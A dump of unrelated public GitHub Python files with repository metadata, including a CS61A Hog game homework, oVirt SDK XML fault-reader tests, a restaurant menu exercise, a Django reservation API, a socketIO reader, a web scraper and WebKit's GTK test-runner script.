return (int(1000000000 * x) - int(1000000000 * y)) / 1000000000
def nano_mul(x, y):
"""
>>> 0.7 * 0.2
0.13999999999999999
>>> -0.7 * 0.2
-0.13999999999999999
>>> nano_mul(0.7, 0.2)
0.14
>>> nano_mul(-0.7, 0.2)
-0.14
:param x:
:param y:
:return:
"""
return int(1000000000 * x) * int(1000000000 * y) / 1000000000000000000
def nano_div(x, y):
"""
>>> 0.7 / 0.2
3.4999999999999996
>>> -0.7 / 0.2
-3.4999999999999996
>>> nano_div(0.7, 0.2)
3.5
>>> nano_div(-0.7, 0.2)
-3.5
:param x:
:param y:
:return:
"""
return float(1000000000 * x) / int(1000000000 * y)
def nano_mod(x, y):
"""
>>> 0.7 % 0.2
0.09999999999999992
>>> -0.7 % 0.2
0.10000000000000009
>>> nano_mod(0.7, 0.2)
0.1
>>> nano_mod(-0.7, 0.2)
0.1
:param x:
:param y:
:return:
"""
number = type(x)
nx = int(1000000000 * x)
ny = int(1000000000 * y)
q, r = divmod(nx, ny)
return number(r / 1000000000)
def nano_divmod(x, y):
"""
>>> divmod(0.7, 0.2)
(3.0, 0.09999999999999992)
>>> nano_divmod(0.7, 0.2)
(3, 0.1)
:param x:
:param y:
:return:
"""
number = type(x)
nx = int(1000000000 * x)
ny = int(1000000000 * y)
q, r = divmod(nx, ny)
return int(q), number(r / 1000000000)
def signum(n):
try:
if isnan(n):
return float("nan")
if n > 0 or n == float("inf"):
return 1
if n < 0 or n == float("-inf"):
return -1
return 0
except TypeError:
raise TypeError(n)
def symmetric_divmod(dividend, divisor):
number = type(dividend)
if dividend >= 0:
quotient, remainder = divmod(dividend, divisor)
return int(quotient), number(remainder)
else:
quotient, remainder = divmod(-dividend, divisor)
return -int(quotient), -number(remainder)
def round_half_to_even(n):
"""
>>> round_half_to_even(3)
3
>>> round_half_to_even(3.2)
3
>>> round_half_to_even(3.5)
4
>>> round_half_to_even(3.7)
4
>>> round_half_to_even(4)
4
>>> round_half_to_even(4.2)
4
>>> round_half_to_even(4.5)
4
>>> round_half_to_even(4.7)
5
:param n:
:return:
"""
ten_n = 10 * n
if ten_n == int(ten_n) and ten_n % 10 == 5:
up = int(n + 0.5)
down = int(n - 0.5)
return up if up % 2 == 0 else down
else:
return int(round(n))
|
[
"omerl1308@gmail.com"
] |
omerl1308@gmail.com
|
b19775a6ca6dc6d028c8ce0a658a8fc8661e20a9
|
070afb87f2c5fc0dd749204ab648043b86c39088
|
/hog/hog.py
|
52c4d3492438c321604599cbfd6c329b3cd82352
|
[] |
no_license
|
mitchwong2021/CS61A
|
1fa22a955598dd3218aaf6561b8f291532a1b15b
|
709ced7b3dce20ee38257e41131ceac8757aee33
|
refs/heads/master
| 2020-03-16T19:54:53.087499
| 2018-05-10T21:25:58
| 2018-05-10T21:25:58
| 132,937,615
| 0
| 1
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 14,123
|
py
|
"""CS 61A Presents The Game of Hog."""
from dice import six_sided, four_sided, make_test_dice
from ucb import main, trace, interact
GOAL_SCORE = 100 # The goal of Hog is to score 100 points.
######################
# Phase 1: Simulator #
######################
def roll_dice(num_rolls, dice=six_sided):
"""Simulate rolling the DICE exactly NUM_ROLLS > 0 times. Return the sum of
the outcomes unless any of the outcomes is 1. In that case, return 1.
num_rolls: The number of dice rolls that will be made.
dice: A function that simulates a single dice roll outcome.
"""
# These assert statements ensure that num_rolls is a positive integer.
assert type(num_rolls) == int, 'num_rolls must be an integer.'
assert num_rolls > 0, 'Must roll at least once.'
# BEGIN PROBLEM 1
"*** YOUR CODE HERE ***"
rolled_one, score, i = False, 0, 0
while i < num_rolls :
result = dice() #store the function's value in a variable
score = score + result
i = i + 1
if result == 1 :
rolled_one = True
if rolled_one == True :
return 1
else :
return score
# END PROBLEM 1
def free_bacon(score):
"""Return the points scored from rolling 0 dice (Free Bacon).
score: The opponent's current score.
"""
assert score < 100, 'The game should be over.'
# BEGIN PROBLEM 2
"*** YOUR CODE HERE ***" # A player who chooses to roll zero dice
# scores 2 more than the absolute difference
# between the digits in the opponent's total score.
bacon = 0
if len(str(score)) == 1 :
bacon = score + 2
else :
val = (score % 10) - (score - score % 10)//10
if val > 0 :
bacon = val + 2
else :
bacon = 2 - val
return bacon
# END PROBLEM 2
def take_turn(num_rolls, opponent_score, dice=six_sided):
"""Simulate a turn rolling NUM_ROLLS dice, which may be 0 (Free Bacon).
Return the points scored for the turn by the current player.
num_rolls: The number of dice rolls that will be made.
opponent_score: The total score of the opponent.
dice: A function that simulates a single dice roll outcome.
"""
# Leave these assert statements here; they help check for errors.
assert type(num_rolls) == int, 'num_rolls must be an integer.'
assert num_rolls >= 0, 'Cannot roll a negative number of dice in take_turn.'
assert num_rolls <= 10, 'Cannot roll more than 10 dice.'
assert opponent_score < 100, 'The game should be over.'
# BEGIN PROBLEM 3
"*** YOUR CODE HERE ***"
score = 0
x = num_rolls
if num_rolls == 0 :
score = free_bacon(opponent_score)
return score
else:
score = roll_dice(x, dice) # I needed to pass in the "dice" function parameter
return score
# END PROBLEM 3
def is_swap(score0, score1):
"""Return whether one of the scores is an integer multiple of the other."""
# BEGIN PROBLEM 4
"*** YOUR CODE HERE ***"
if score0 > score1 :
if score1 == 0 :
return False
elif score1 == 1 :
return False
elif score0 % score1 == 0 :
return True
else :
return False
elif score1 > score0 :
if score0 == 0:
return False
elif score0 == 1 :
return False
elif score1 % score0 == 0 :
return True
else :
return False
# END PROBLEM 4
def other(player):
"""Return the other player, for a player PLAYER numbered 0 or 1.
>>> other(0)
1
>>> other(1)
0
"""
return 1 - player
def silence(score0, score1):
"""Announce nothing (see Phase 2)."""
return silence
def play(strategy0, strategy1, score0=0, score1=0, dice=six_sided,
goal=GOAL_SCORE, say=silence):
"""Simulate a game and return the final scores of both players, with Player
0's score first, and Player 1's score second.
A strategy is a function that takes two total scores as arguments (the
current player's score, and the opponent's score), and returns a number of
dice that the current player will roll this turn.
strategy0: The strategy function for Player 0, who plays first.
strategy1: The strategy function for Player 1, who plays second.
score0: Starting score for Player 0
score1: Starting score for Player 1
dice: A function of zero arguments that simulates a dice roll.
goal: The game ends and someone wins when this score is reached.
say: The commentary function to call at the end of the first turn.
"""
player = 0 # Which player is about to take a turn, 0 (first) or 1 (second)
# BEGIN PROBLEM 5
while score0 < goal and score1 < goal:
score0 += take_turn(strategy0(score0, score1), score1, dice)
if is_swap(score0,score1):
x = score0
score0, score1 = score1, x
if score0 >=goal:
say(score0,score1)
return score0, score1
elif score1 >=goal:
say = say(score0,score1)
return score0, score1
say = say(score0,score1)
score1 += take_turn(strategy1(score1, score0), score0, dice)
if is_swap(score0,score1):
x = score0
score0, score1 = score1, x
if score0 >=goal:
say = say(score0,score1)
return score0, score1
elif score1 >=goal:
say = say(score0,score1)
return score0, score1
say = say(score0,score1)
# END PROBLEM 5
#######################
# Phase 2: Commentary #
#######################
def say_scores(score0, score1):
"""A commentary function that announces the score for each player."""
print("Player 0 now has", score0, "and Player 1 now has", score1)
return say_scores
def announce_lead_changes(previous_leader=None):
"""Return a commentary function that announces lead changes.
>>> f0 = announce_lead_changes()
>>> f1 = f0(5, 0)
Player 0 takes the lead by 5
>>> f2 = f1(5, 12)
Player 1 takes the lead by 7
>>> f3 = f2(8, 12)
>>> f4 = f3(8, 13)
>>> f5 = f4(15, 13)
Player 0 takes the lead by 2
"""
def say(score0, score1):
if score0 > score1:
leader = 0
elif score1 > score0:
leader = 1
else:
leader = None
if leader != None and leader != previous_leader:
print('Player', leader, 'takes the lead by', abs(score0 - score1))
return announce_lead_changes(leader)
return say
def both(f, g):
"""Return a commentary function that says what f says, then what g says.
>>> h0 = both(say_scores, announce_lead_changes())
>>> h1 = h0(10, 0)
Player 0 now has 10 and Player 1 now has 0
Player 0 takes the lead by 10
>>> h2 = h1(10, 6)
Player 0 now has 10 and Player 1 now has 6
>>> h3 = h2(6, 18) # Player 0 gets 8 points, then Swine Swap applies
Player 0 now has 6 and Player 1 now has 18
Player 1 takes the lead by 12
"""
def say(score0, score1):
return both(f(score0, score1), g(score0, score1))
return say
def announce_highest(who, previous_high=0, previous_score=0): #the previous_high is the previous highest gain!
"""Return a commentary function that announces when WHO's score
increases by more than ever before in the game.
>>> f0 = announce_highest(1) # Only announce Player 1 score gains
>>> f1 = f0(11, 0)
>>> f2 = f1(11, 1)
1 point! That's the biggest gain yet for Player 1
>>> f3 = f2(20, 1)
>>> f4 = f3(5, 20) # Player 1 gets 4 points, then Swine Swap applies
19 points! That's the biggest gain yet for Player 1
>>> f5 = f4(20, 40) # Player 0 gets 35 points, then Swine Swap applies
20 points! That's the biggest gain yet for Player 1
>>> f6 = f5(20, 55) # Player 1 gets 15 points; not enough for a new high
"""
assert who == 0 or who == 1, 'The who argument should indicate a player.'
# BEGIN PROBLEM 7
"*** YOUR CODE HERE ***"
def say(score0, score1):
if who == 1:
gain = score1 - previous_score
player = 1
x = score1
else:
gain = score0 - previous_score
player = 0
x = score0
if gain > previous_high and gain == 1:
print(gain, "point! That's the biggest gain yet for Player", player)
elif gain > previous_high :
print(gain, "points! That's the biggest gain yet for Player", player)
if gain > previous_high:
return announce_highest(who, gain, x)
else:
return announce_highest(who, previous_high, x)
return say
# END PROBLEM 7
#######################
# Phase 3: Strategies #
#######################
def always_roll(n):
"""Return a strategy that always rolls N dice.
A strategy is a function that takes two total scores as arguments (the
current player's score, and the opponent's score), and returns a number of
dice that the current player will roll this turn.
>>> strategy = always_roll(5)
>>> strategy(0, 0)
5
>>> strategy(99, 99)
5
"""
def strategy(score, opponent_score):
return n
return strategy
def make_averaged(fn, num_samples=1000):
"""Return a function that returns the average value of FN when called.
To implement this function, you will have to use *args syntax, a new Python
feature introduced in this project. See the project description.
>>> dice = make_test_dice(4, 2, 5, 1)
>>> averaged_dice = make_averaged(dice, 1000)
>>> averaged_dice()
3.0
"""
# BEGIN PROBLEM 8
"*** YOUR CODE HERE ***"
def zod(*args):
i, sum = 0, 0
while i < num_samples:
i, sum = i + 1, sum + fn(*args)
return sum/ num_samples
return zod
# END PROBLEM 8
def max_scoring_num_rolls(dice=six_sided, num_samples=1000):
"""Return the number of dice (1 to 10) that gives the highest average turn
score by calling roll_dice with the provided DICE over NUM_SAMPLES times.
Assume that the dice always return positive outcomes.
>>> dice = make_test_dice(1, 6)
>>> max_scoring_num_rolls(dice)p
1
"""
# BEGIN PROBLEM 9
"*** YOUR CODE HERE ***"
max_dice, number_of_dice, max_value = 0, 10, 0
while number_of_dice>0:
x = make_averaged(roll_dice)(number_of_dice, dice)
if x > max_value:
max_value = x
max_dice = number_of_dice
number_of_dice -=1
return max_dice
# END PROBLEM 9
def winner(strategy0, strategy1):
"""Return 0 if strategy0 wins against strategy1, and 1 otherwise."""
score0, score1 = play(strategy0, strategy1)
if score0 > score1:
return 0
else:
return 1
def average_win_rate(strategy, baseline=always_roll(4)):
"""Return the average win rate of STRATEGY against BASELINE. Averages the
winrate when starting the game as player 0 and as player 1.
"""
win_rate_as_player_0 = 1 - make_averaged(winner)(strategy, baseline)
win_rate_as_player_1 = make_averaged(winner)(baseline, strategy)
return (win_rate_as_player_0 + win_rate_as_player_1) / 2
def run_experiments():
"""Run a series of strategy experiments and report results."""
if True: # Change to False when done finding max_scoring_num_rolls
six_sided_max = max_scoring_num_rolls(six_sided)
print('Max scoring num rolls for six-sided dice:', six_sided_max)
if False: # Change to True to test always_roll(8)
print('always_roll(8) win rate:', average_win_rate(always_roll(8)))
if False: # Change to True to test bacon_strategy
print('bacon_strategy win rate:', average_win_rate(bacon_strategy))
if False: # Change to True to test swap_strategy
print('swap_strategy win rate:', average_win_rate(swap_strategy))
if False: # Change to True to test final_strategy
print('final_strategy win rate:', average_win_rate(final_strategy))
"*** You may add additional experiments as you wish ***"
def bacon_strategy(score, opponent_score, margin=8, num_rolls=4):
"""This strategy rolls 0 dice if that gives at least MARGIN points, and
rolls NUM_ROLLS otherwise.
"""
# BEGIN PROBLEM 10
if free_bacon(opponent_score) >= margin:
return 0
else:
return num_rolls
# END PROBLEM 10
def swap_strategy(score, opponent_score, margin=8, num_rolls=4):
"""This strategy rolls 0 dice when it triggers a beneficial swap. It also
rolls 0 dice if it gives at least MARGIN points. Otherwise, it rolls
NUM_ROLLS.
"""
# BEGIN PROBLEM 11
if free_bacon(opponent_score) >= margin:
return 0
elif is_swap(score, opponent_score) == True and opponent_score > score:
return 0
else:
return num_rolls
# END PROBLEM 11
def final_strategy(score, opponent_score):
"""Write a brief description of your final strategy.
*** YOUR DESCRIPTION HERE ***
"""
# BEGIN PROBLEM 12
return 4 # Replace this statement
# END PROBLEM 12
##########################
# Command Line Interface #
##########################
# NOTE: Functions in this section do not need to be changed. They use features
# of Python not yet covered in the course.
@main
def run(*args):
"""Read in the command-line argument and calls corresponding functions.
This function uses Python syntax/techniques not yet covered in this course.
"""
import argparse
parser = argparse.ArgumentParser(description="Play Hog")
parser.add_argument('--run_experiments', '-r', action='store_true',
help='Runs strategy experiments')
args = parser.parse_args()
if args.run_experiments:
run_experiments()
|
[
"noreply@github.com"
] |
mitchwong2021.noreply@github.com
|
b00c7ba14a6e28b8a9fd1d4c603605f6e97f4ff7
|
da750f9ffee13f8388e0d3ac48db2eab562e5a2b
|
/tests/test_fault_reader.py
|
5b03453e681de92e0024dfadde4ca533df9401c1
|
[
"Apache-2.0"
] |
permissive
|
fjanuska/python-ovirt-engine-sdk4
|
f86085da0d1e3044d04c41aee5b842ccec37a094
|
8d51d43c63709a2c6064a9d9b8e095874fff4f2e
|
refs/heads/main
| 2023-08-18T13:12:46.491667
| 2021-09-29T13:18:01
| 2021-09-29T13:18:01
| 411,636,996
| 0
| 0
|
Apache-2.0
| 2021-09-29T10:56:52
| 2021-09-29T10:56:51
| null |
UTF-8
|
Python
| false
| false
| 2,814
|
py
|
# -*- coding: utf-8 -*-
#
# Copyright (c) 2016 Red Hat, Inc.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
#
from io import BytesIO
from nose.tools import *
from ovirtsdk4 import types
from ovirtsdk4 import readers
from ovirtsdk4.xml import XmlReader
def make_reader(text):
"""
Creates an IO objec that reads from the given text.
"""
return XmlReader(BytesIO(text.encode('utf-8')))
def test_read_one_with_empty_xml():
"""
Checks that given an empty XML element the `read_one` method creates
creates the expected fault.
"""
reader = make_reader('<fault/>')
result = readers.FaultReader.read_one(reader)
reader.close()
assert_is_not_none(result)
assert_is(type(result), types.Fault)
assert_is_none(result.reason)
assert_is_none(result.detail)
def test_read_one_with_reason_only():
"""
Checks that given an an XML with only the reason element the
`read_one` method creates creates the expected fault.
"""
reader = make_reader('<fault><reason>myreason</reason></fault>')
result = readers.FaultReader.read_one(reader)
reader.close()
assert_is_not_none(result)
assert_is(type(result), types.Fault)
assert_equals(result.reason, 'myreason')
assert_is_none(result.detail)
def test_read_one_with_detail_only():
"""
Checks that given an an XML with only the detail element the
`read_one` method creates creates the expected fault.
"""
reader = make_reader('<fault><detail>mydetail</detail></fault>')
result = readers.FaultReader.read_one(reader)
reader.close()
assert_is_not_none(result)
assert_is(type(result), types.Fault)
assert_is_none(result.reason)
assert_equals(result.detail, 'mydetail')
def test_read_one_with_reason_and_detail():
"""
Checks that given an an XML with only the reason and deetail
elements `read_one` method creates creates the expected fault.
"""
reader = make_reader("""
<fault>
<reason>myreason</reason>
<detail>mydetail</detail>
</fault>
""")
result = readers.FaultReader.read_one(reader)
reader.close()
assert_is_not_none(result)
assert_is(type(result), types.Fault)
assert_equals(result.reason, 'myreason')
assert_equals(result.detail, 'mydetail')
|
[
"necas.marty@gmail.com"
] |
necas.marty@gmail.com
|
7456e413b9a3950f919689a98dbe123bc227b91e
|
0a584b8d564e1cf3b2c4fbc3c4fa2a74007dcb00
|
/script.py
|
a1ae18f5df84505790f67c6246887b363864bd22
|
[] |
no_license
|
obour2021/Basta-Fazoolin-
|
079902d8d03bf24904a3dc5e251f79fa792961e0
|
4edbfd6b76b0cd6703c0149fdde165f88e7285cb
|
refs/heads/master
| 2023-06-12T16:48:35.318264
| 2021-07-06T12:13:11
| 2021-07-06T12:13:11
| 383,453,712
| 0
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 2,824
|
py
|
class Menu:
def __init__(self, name, items, start_time, end_time):
self.name = name
self.items = items
self.start_time = start_time
self.end_time = end_time
def __repr__(self):
return "{name} menu available from {start_time}:00GMT to {end_time}:00GMT".format(name=self.name, start_time=self.start_time, end_time=self.end_time)
def calculate_bill(self, purchased_items):
total_bill = 0
for purchased_item in purchased_items:
if purchased_item in self.items:
total_bill += self.items[purchased_item]
return total_bill
class Franchise:
def __init__(self, address, menus):
self.address = address
self.menus = menus
def __repr__(self):
return "This Franchise is located at {address}.".format(address=self.address)
def available_menus(self, time):
available_menus = []
for menu in self.menus:
if time >= menu.start_time and time <= menu.end_time:
available_menus.append(menu)
return available_menus
class Business:
def __init__(self, name, franchises):
self.name = name
self.franchise = franchise
brunch_items = {
'pancakes': 7.50, 'waffles': 9.00, 'burger': 11.00, 'home fries': 4.50, 'coffee': 1.50, 'espresso': 3.00, 'tea': 1.00, 'mimosa': 10.50, 'orange juice': 3.50
}
brunch = Menu("Brunch", brunch_items, 11, 16)
early_bird_items = {
'salumeria plate': 8.00, 'salad and breadsticks (serves 2, no refills)': 14.00, 'pizza with quattro formaggi': 9.00, 'duck ragu': 17.50, 'mushroom ravioli (vegan)': 13.50, 'coffee': 1.50, 'espresso': 3.00,
}
early_bird = Menu("Early-bird Dinners", early_bird_items, 15, 18)
dinner_items = {
'crostini with eggplant caponata': 13.00, 'ceaser salad': 16.00, 'pizza with quattro formaggi': 11.00, 'duck ragu': 19.50, 'mushroom ravioli (vegan)': 13.50, 'coffee': 2.00, 'espresso': 3.00,
}
dinner = Menu("Dinner", dinner_items, 17, 23)
kids_items = {
'chicken nuggets': 6.50, 'fusilli with wild mushrooms': 12.00, 'apple juice': 3.00
}
kids = Menu("Kids", kids_items, 11, 21)
arepas_menu_items = {
'arepa pabellon': 7.00, 'pernil arepa': 8.50, 'guayanes arepa': 8.00, 'jamon arepa': 7.50
}
arepas_menu = Menu("Take a’ Arepa", arepas_menu_items, 10, 20)
menus = [brunch, early_bird, dinner, kids, arepas_menu]
flagship_store = Franchise("1232 West End Road", menus)
new_installment = Franchise("12 East Mulberry Street", menus)
arepas_place = Franchise("189 Fitzgerald Avenue", menus)
franchise = [flagship_store, new_installment, arepas_place]
first_business = Business("Basta Fazoolin' with my Heart", franchise)
new_business = Business("Take a' Arepa", franchise)
print(flagship_store.available_menus(23))
print(early_bird.calculate_bill(['mushroom ravioli (vegan)', 'salumeria plate']))
print(brunch.calculate_bill(['pancakes', 'home fries', 'coffee']))
|
[
"isaac.mensah@amalitech.org"
] |
isaac.mensah@amalitech.org
|
92b02adbbcf00bbc96565f31382f594567671f18
|
04b26abb0b9eba98baaa82bdb144cf2b3e9cee42
|
/autocomplete_api/apps.py
|
9c04a682ff41fa1873ebb61a40b6fb6b34d7adb8
|
[] |
no_license
|
ped-alm/Dito_Challenge
|
46f04628ede60d5c680721bb28f945093b61b422
|
ae0dafd58acf1083e9d34057827e19b29a3ab396
|
refs/heads/master
| 2020-04-20T16:26:03.185376
| 2019-02-08T12:28:50
| 2019-02-08T12:28:50
| null | 0
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 106
|
py
|
from django.apps import AppConfig
class AutoCompleteApiConfig(AppConfig):
name = 'autocomplete_api'
|
[
"pedrohenriquealmeidacosta@gmail.com"
] |
pedrohenriquealmeidacosta@gmail.com
|
22db75686ffaf6b5f0da276f630ea779f6ee2271
|
b41a33dff85005ed970f80fcec781436b63c6103
|
/tributary/reactive/input/socketio.py
|
750a694ac1660e00c764be1527841af77bb0673a
|
[
"Apache-2.0"
] |
permissive
|
deepankarsharma/tributary
|
afcf0f3bd048f8a792caec572ef9a4f97a2fb2f3
|
aa0eddc3f83a30b4e43f2c1771a1e00fd9d97cd7
|
refs/heads/master
| 2020-03-28T21:51:35.641555
| 2018-09-17T20:59:38
| 2018-09-17T20:59:38
| null | 0
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 1,082
|
py
|
from socketIO_client_nexus import SocketIO as SIO
try:
from urllib.parse import urlparse
except ImportError:
from urlparse import urlparse
from ..base import _wrap
def SocketIO(url, *args, **kwargs):
return SyncSocketIO(url, *args, **kwargs)
def SyncSocketIO(url, channel='', field='', sendinit=None, json=False, wrap=False, interval=1):
o = urlparse(url)
socketIO = SIO(o.scheme + '://' + o.netloc, o.port)
if sendinit:
socketIO.emit(sendinit)
def _sio(url, channel, field='', json=False, wrap=False, interval=1):
while True:
_data = []
socketIO.on(channel, lambda data: _data.append(data))
socketIO.wait(seconds=interval)
for msg in _data:
if json:
msg = json.loads(msg)
if field:
msg = msg[field]
if wrap:
msg = [msg]
yield msg
return _wrap(_sio, dict(url=url, channel=channel, field=field, json=json, wrap=wrap, interval=interval), name='SocketIO')
|
[
"t.paine154@gmail.com"
] |
t.paine154@gmail.com
|
d10fcd68f8efb426334892649e0a7128f55b1fd4
|
a9f676c06bacee1f8b27e08d3c411c89a69cfd40
|
/falmer/studentgroups/views.py
|
3c28e4397c6ade0b3db42472038d4f3fa933b6b4
|
[
"MIT"
] |
permissive
|
sussexstudent/falmer
|
1b877c3ac75a0477f155ce1a9dee93a5ada686d6
|
ae735bd9d6177002c3d986e5c19a78102233308f
|
refs/heads/master
| 2022-12-11T19:40:12.232488
| 2020-03-20T13:01:47
| 2020-03-20T13:01:47
| 88,043,958
| 2
| 3
|
MIT
| 2022-12-08T03:17:26
| 2017-04-12T11:24:02
|
Python
|
UTF-8
|
Python
| false
| false
| 37
|
py
|
from django.http import JsonResponse
|
[
"james@brudil.com"
] |
james@brudil.com
|
401fbd0e0fe0707b28342acd94a30e4a0988e967
|
228de37ad02ee9af51a208ad3287224af1f2c472
|
/app/reservation/apis/reservation.py
|
e05f7278c55cc03bd59302529d88a865ff36c81d
|
[] |
no_license
|
kahee/MySmallTrip
|
cb0b0a9afdee009f3b4055af92af0bc5ec50f0cd
|
75e1bf32993f137e70360f6aa3b22904d61bd24c
|
refs/heads/master
| 2022-12-11T18:57:12.494011
| 2018-09-02T09:12:59
| 2018-09-02T09:12:59
| 130,799,032
| 1
| 0
| null | 2022-12-08T01:01:50
| 2018-04-24T05:08:26
|
Python
|
UTF-8
|
Python
| false
| false
| 1,210
|
py
|
from rest_framework import status, permissions
from rest_framework.response import Response
from rest_framework.views import APIView
from reservation.models import Reservation
from reservation.serializer import ReservationCreateSerializer, ReservationListSerializer
class ReservationCreateView(APIView):
permission_classes = (
permissions.IsAuthenticated,
)
def get(self):
context = {'request': self.request}
reservation_informations = Reservation.objects.filter()
serializer = ReservationCreateSerializer(reservation_informations, context=context, many=True)
return Response(serializer.data, status=status.HTTP_200_OK)
def post(self, request):
context = {
'request': self.request,
}
serializer = ReservationCreateSerializer(data=request.data, context=context)
if serializer.is_valid(raise_exception=True):
reservation = serializer.save()
data = {
'reservation': ReservationListSerializer(reservation).data
}
return Response(data, status=status.HTTP_201_CREATED)
else:
return Response(status=status.HTTP_400_BAD_REQUEST)
|
[
"hsj2334@gmail.com"
] |
hsj2334@gmail.com
|
7b5e42b03d83f409b260b99e32203f2b92baa90d
|
cb3d1b072391b07ef0e9596df7f223f37683e970
|
/[0448]_Find_All_Numbers_Disappeared_in_an_Array/Find_All_Numbers_Disappeared_in_an_Array.py
|
d6f8e35a55cb7a49492d347457eed1386a3ed63a
|
[] |
no_license
|
kotori233/LeetCode
|
99620255a64c898457901602de5db150bc35aabb
|
996f9fcd26326db9b8f49078d9454fffb908cafe
|
refs/heads/master
| 2021-09-10T18:00:56.968949
| 2018-03-30T14:38:27
| 2018-03-30T14:38:27
| 103,036,334
| 1
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 490
|
py
|
class Solution(object):
def findDisappearedNumbers(self, nums):
"""
:type nums: List[int]
:rtype: List[int]
"""
n = len(nums)
res = []
for i in range(n):
while nums[i] != i + 1 and nums[i] != nums[nums[i] - 1]:
temp = nums[i] - 1
nums[i], nums[temp] = nums[temp], nums[i]
for i in range(n):
if nums[i] != i + 1:
res.append(i + 1)
return res
|
[
"cycycy3333@163.com"
] |
cycycy3333@163.com
|
c1a9bd3f28bb8cf15970e6bb6d06f6a3be4f8bbb
|
c492ca97c553319be3965a4ec79fa11cfe959c1f
|
/parser_project_1.py
|
46fb9402b7178913bee30e83fece8e031164be26
|
[] |
no_license
|
rocketpy/web_scraping
|
a626b8459a2d7fbcd5d6e7e4a8c35fcb55fbd59d
|
53b4ef7e204efa08199c14c29b5501b454280cc8
|
refs/heads/master
| 2022-09-15T13:24:07.225362
| 2022-08-29T20:45:03
| 2022-08-29T20:45:03
| 178,544,090
| 0
| 1
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 1,017
|
py
|
import csv
import requests
from bs4 import BeautifulSoup
def get_html(url):
r = requests.get(url)
return r.text
def refined(s):
r = s.split(' ')[0]
return r.replace('.00', '')
def write_csv(data):
with open('file_name.csv', 'a') as f:
writer = csv.writer(f, delimiter=',')
writer.writerow((data['name'],
data['url'],
data['reviews']))
def get_data(html):
parse = BeautifulSoup(html , 'lxml')
popular = parse.find_all('section')[1]
plagins = popular.find_all('article')
for i in plagins:
name = i.find('h2').text
url = i.find('h2').find('a').get('href')
r = i.find('span', class_='rating-count').find('a').text
rating = refined(r)
data = {'name': name,
'url': url,
'reviews': rating}
write_csv(data)
def main():
url = 'https://www...'
get_data(get_html(url))
if __name__ == '__main__':
main()
|
[
"noreply@github.com"
] |
rocketpy.noreply@github.com
|
c41f4e23a8c90d9a853b30e124a05c5d69277989
|
4daed53ef188fe57fc90771c9042dd137e306261
|
/WebKit/Tools/Scripts/run-gtk-tests
|
df3d66cd4a75498506b6cda51340381097623e6a
|
[
"Apache-2.0"
] |
permissive
|
JavaScriptTesting/LJS
|
ece7d0537b514e06f7f6b26cb06a9ab4e6cd7e10
|
9818dbdb421036569fff93124ac2385d45d01c3a
|
refs/heads/master
| 2020-03-12T14:28:41.437178
| 2018-04-25T10:55:15
| 2018-04-25T10:55:15
| 130,668,210
| 1
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 4,168
|
#!/usr/bin/env python
#
# Copyright (C) 2011 Igalia S.L.
#
# This library is free software; you can redistribute it and/or
# modify it under the terms of the GNU Library General Public
# License as published by the Free Software Foundation; either
# version 2 of the License, or (at your option) any later version.
#
# This library is distributed in the hope that it will be useful,
# but WITHOUT ANY WARRANTY; without even the implied warranty of
# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the GNU
# Library General Public License for more details.
#
# You should have received a copy of the GNU Library General Public License
# along with this library; see the file COPYING.LIB. If not, write to
# the Free Software Foundation, Inc., 51 Franklin Street, Fifth Floor,
# Boston, MA 02110-1301, USA.
from webkitpy.common.system.executive import Executive
import subprocess
import os, sys
class TestRunner:
TEST_DIRS = [ "unittests", "WebKit2APITests" ]
# FIXME: https://bugs.webkit.org/show_bug.cgi?id=74717
SKIPPED = [ "unittests/testdownload", "unittests/testwebview", "unittests/testwebresource"]
def __init__(self):
self._executive = Executive()
# FIXME: webkit-build-directory --configuration always returns
# Release because we never call set-webkit-configuration.
#build_directory_script = os.path.join(os.path.dirname(__file__), "webkit-build-directory")
#build_directory = self._executive.run_command([build_directory_script, "--configuration"]).rstrip()
def is_valid_build_directory(build_dir):
return os.path.exists(os.path.join(build_dir, ".libs"))
script_dir = os.path.dirname(__file__)
top_level = os.path.normpath(os.path.join(script_dir, "..", ".."))
build_directory = os.path.join(top_level, 'WebKitBuild', 'Release')
if not is_valid_build_directory(build_directory):
build_directory = os.path.join(top_level, 'WebKitBuild', 'Debug')
self._gtk_tools_directory = os.path.join(top_level, "Tools", "gtk")
self._programs_path = os.path.join(build_directory, "Programs")
self._tests = []
for test_dir in self.TEST_DIRS:
absolute_test_dir = os.path.join(self._programs_path, test_dir)
if not os.path.isdir(absolute_test_dir):
continue
for test_file in os.listdir(absolute_test_dir):
test_relative_path = os.path.join(test_dir, test_file)
if test_relative_path in self.SKIPPED:
sys.stdout.write("Skipping test %s\n" % (test_relative_path))
sys.stdout.flush()
continue
test_path = os.path.join(self._programs_path, test_relative_path)
if os.path.isfile(test_path) and os.access(test_path, os.X_OK):
self._tests.append(test_path)
def run(self):
if not self._tests:
sys.stderr.write("ERROR: tests not found in %s.\n" % (self._programs_path))
sys.stderr.flush()
return 1
test_env = os.environ
test_env["DISPLAY"] = ":55"
exit_status = [0]
def _error_handler(error):
exit_status[0] = error.exit_code
jhbuild_path = os.path.join(self._gtk_tools_directory, "run-with-jhbuild")
for test in self._tests:
out = self._executive.run_command([jhbuild_path ,'gtester', test], env=test_env,
error_handler=_error_handler)
sys.stdout.write(out)
sys.stdout.flush()
if exit_status[0]:
sys.stdout.write("Tests failed\n")
sys.stdout.flush()
return exit_status[0]
if __name__ == "__main__":
try:
xvfb = Executive().popen(["Xvfb", ":55", "-screen", "0", "800x600x24", "-nolisten", "tcp"],
stdout=subprocess.PIPE, stderr=subprocess.PIPE)
except:
sys.stderr.write("Failed to run Xvfb\n")
sys.stderr.flush()
sys.exit(1)
try:
sys.exit(TestRunner().run())
finally:
xvfb.kill()
|
[
"cumtcsgpf@gmail.com"
] |
cumtcsgpf@gmail.com
|
|
08922950ea62ec4b9ef9069f09d94cce46ec64e0
|
